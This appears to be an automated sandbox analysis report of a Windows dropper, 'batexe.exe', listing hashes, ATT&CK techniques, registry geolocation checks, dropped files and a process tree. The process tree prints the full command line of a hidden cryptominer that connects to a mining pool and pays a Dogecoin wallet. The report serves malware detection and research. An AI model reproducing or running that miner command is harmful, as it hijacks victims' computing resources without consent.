73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
301s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
22-02-2024 01:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4908	b2e.exe
3860	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3860	cpuminer-sse2.exe
3860	cpuminer-sse2.exe
3860	cpuminer-sse2.exe
3860	cpuminer-sse2.exe
3860	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/928-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 928 wrote to memory of 4908	928	batexe.exe	89
PID 928 wrote to memory of 4908	928	batexe.exe	89
PID 928 wrote to memory of 4908	928	batexe.exe	89
PID 4908 wrote to memory of 2164	4908	b2e.exe	90
PID 4908 wrote to memory of 2164	4908	b2e.exe	90
PID 4908 wrote to memory of 2164	4908	b2e.exe	90
PID 2164 wrote to memory of 3860	2164	cmd.exe	93
PID 2164 wrote to memory of 3860	2164	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:928
- C:\Users\Admin\AppData\Local\Temp\61E6.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\61E6.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\61E6.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6513.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\61E6.tmp\b2e.exe

Filesize
14.6MB

MD5
ca7f18fbca7be38691ef4097fa1c491b

SHA1
996fa2c8a6f9b6d04dcdc35dd560d9f4e65c3486

SHA256
01f04e1d27f83db2618356dd806979d14d082432c9a043243598d8eb245e1c3e

SHA512
0f9b5e6b41bfe555d0e254109e3aacb510aaaf44ae85a9508ef42f96c6d502e6aecabe35650b937f58ed3eb8e45b7362dd185185759ba144086b552b23f7a993

Download Submit
C:\Users\Admin\AppData\Local\Temp\61E6.tmp\b2e.exe

Filesize
4.4MB

MD5
97c7af597fd5d27204e568a461e45148

SHA1
06e776c6dc669a9c882b86592dcc660b29b7b1d8

SHA256
bee5e1d544182972880b2f153eea3a5b6b4bdaaec1a0e7cb552e9e220847e94e

SHA512
7f32b3f35e4371c28a827edf5c56cc33cf30b19f6e6785991c0500af6336744c6dc17358c21702960df9be5207dd07f4258f0964b4d50a5e74629a49e73877f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\61E6.tmp\b2e.exe

Filesize
5.8MB

MD5
145e58c8ecdc8e1566222810ccf4707d

SHA1
a2ef005b3a7a4be08a3ea46386fa50eab2c71fd4

SHA256
745469a1fef6b7ec3bd2911a2825ad23ee7e57ba703f8329f264e888b84ddf9e

SHA512
f1a3f80263a54d10b0a08fe311c2113e0ddf9834fa03bb98c58faf0da2c9c16ea5b0a40b26178ba715a4669d64adfce82b24a7c4b3a5f2477f148a313ef6d0fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\6513.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
927KB

MD5
0977082c26b3a87ea73263b2587a5b44

SHA1
a55e5109435b3f07afe8fb88634fe46b8e21dfdd

SHA256
07b96bb4107e706fb9d7562f16e807a86a467520e47643f269c287809b23ff93

SHA512
fc194c304c62529d7af30e965561298a9c6efdd5abb278cd378c603c6077d7a8c85504cc5cef4ba1bc603c140ea63ecd7a3c67132aa13b53195d6535167ebe3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
939KB

MD5
73747dd138989b38928b621cfd5589dc

SHA1
9bca27b50abb2abe2148760670fec9b70e54286c

SHA256
b787d477be12483a9fd4eaa523098e9bf67978b760b99ff1e8413fe269808719

SHA512
58b7d2bc9186edd7d3f68a95edf9ddde295f508e5653c47658ad1ab61f0b1d68844cc2afa8dc9e0dd08b1fb2bd27dfa0485f690539a4e52933996d191798ef49

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
806KB

MD5
ab2629309dbce90705818e94c90ced6e

SHA1
5c150d3055a388b0aaf0c058845062064d68f426

SHA256
adacadda775667a66181e0f0549eabf3f15b75992971c554a9570155856271d4

SHA512
ddfe3c4c895629d9433b55562a46adeb05668fb6be0f11121dd3f51a814059c15fe09b7b0cd3862b731e50b1e866c5443c0639dfae40d9b1ae70df294e792732

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
439KB

MD5
32cbb2e70355660096e92a4f92856c0c

SHA1
dd9737a055f3ca99c62d306b6e1374dd001d6ec7

SHA256
1ba62458d42a50dd0824e3ddcd2a800f62a1fb96f8f06e309d95c99cdb5850a9

SHA512
4eabf51c825cd4cd373b58d944443a3b5f690086fba3fd6807f7ac58b3abd0e59891c1b6a55660f2ba79e63c544bcba6c00b67bcab36c5d11442321f5d5300ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
849KB

MD5
2d700507c08f172b5144f1b94efe597f

SHA1
d934ef2e465caaace45baa1d4ce0be900a6e754e

SHA256
1c33161955c2cdedd8f39b28465fa435335d82f33dba2b995027dccb88f922d4

SHA512
d554e6c71ad3c5d46346b863430519add7ddf6c6abad92e1bc3a188373a6f7dc4fea4c23498bc2405fb69c05773ace5d6db188c39fe48743afeb7d7a04288131

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
744KB

MD5
ce6529a05425850ac1da4622f76e926f

SHA1
c28c55ef014e8143e2b5294ee48c4178cedf1913

SHA256
be18f652fea576540dff9d28a32b012d2ade38f3d97e7cc3ddf3d1dd32c8a16b

SHA512
1e889ac7c9661d3839a475310fa5f72dc53acbd22a17f3ce0614863cf044b29416e0b5fe2497c14c030e8e336c69837b8bc9ed41468aff733e041ff5da0642c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
791KB

MD5
8f365a479bdb6ddb831194592009b449

SHA1
706ad53b079d21b8d26d58a83c3a296af1f333d3

SHA256
7466c792a404429b97e49dff397cd486cbbbd955708ae5db4a502be843e87e78

SHA512
8ef5840e086072017113f71e1d1e36ceeaba069cf8bd35a3713d0faf0035be12c2e9642615398b33962ede1d0ae0c477752042bacde90eff11cd5b3a97c42bfc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
444KB

MD5
68d8efde09ee5b49ae9ad2406951c904

SHA1
39949b5cf64aa67d66f629f2ff90b17afdbfd0f9

SHA256
ffa44a6a93543f821bc017cf07230c18d4c67b1a2ea50ff6090441b49daa87ce

SHA512
cc42a7c25aa309fd31982406176b7d9fe0f90e49af8737265b039c9cbdfd14c2edf453a876789a18ed4bd94e8de4e13af844929b4ad7381795edb894edc4c2c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
337KB

MD5
bb45c00394ab4cc124c705ea9d7d97f7

SHA1
c0c456ada375d98295576656533836390aae0781

SHA256
09bec1db81a5d40a78b237910a2697d6d208c2397e7c82aec9283b5501c0c2a8

SHA512
89839a00e06ee68d4a446b1b958df886f0701bc4c4ed0bc4b15142c07ae2faf5465d9c60c7b8eaa4d1c68c1cbe3d4ce5416266a86d3a8d6ae834b1df7e0c0c76

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
331KB

MD5
2b003ad5f165f8791a01fb1628cce36c

SHA1
5a4f3f8949b642cc38a85a76869a60c679ee157a

SHA256
6d4a85be6e4f8494004ed039ba123236a1c153cd6dc9fb327ac30bf66b36f5ef

SHA512
cd2e5ba72f8dd1886b423a13536abb21cfec664bae639d11d0bd58b9121fb691e733cabc4ee2a7e0b65fe979037459c019c3e2b19a14efedae6df8cfe09ed28b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
237KB

MD5
1efe26c8fdeaaf32699bd92ec77c56a3

SHA1
a3068659d485713eaeea67e77c4864a9a85149ab

SHA256
c42168876e9aa12ba84d18119eb2b1d8835c5b0ac6eb056b94b2ae5196348cd4

SHA512
545cc60d2facd654fa1b7caff7f1c6c7701ca2df3b04e981ed1c5e6989aefdec759bc2a4a060c823a8e7950a4fcfc7c11bd5943b2f1c0488ba32a0057a10b1a8

Download Submit
memory/928-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3860-46-0x0000000065B60000-0x0000000065BF8000-memory.dmp

Filesize
608KB

Download
memory/3860-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3860-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3860-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3860-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3860-47-0x0000000001110000-0x00000000029C5000-memory.dmp

Filesize
24.7MB

Download
memory/3860-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3860-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3860-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3860-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3860-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3860-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3860-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3860-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3860-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3860-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4908-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4908-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download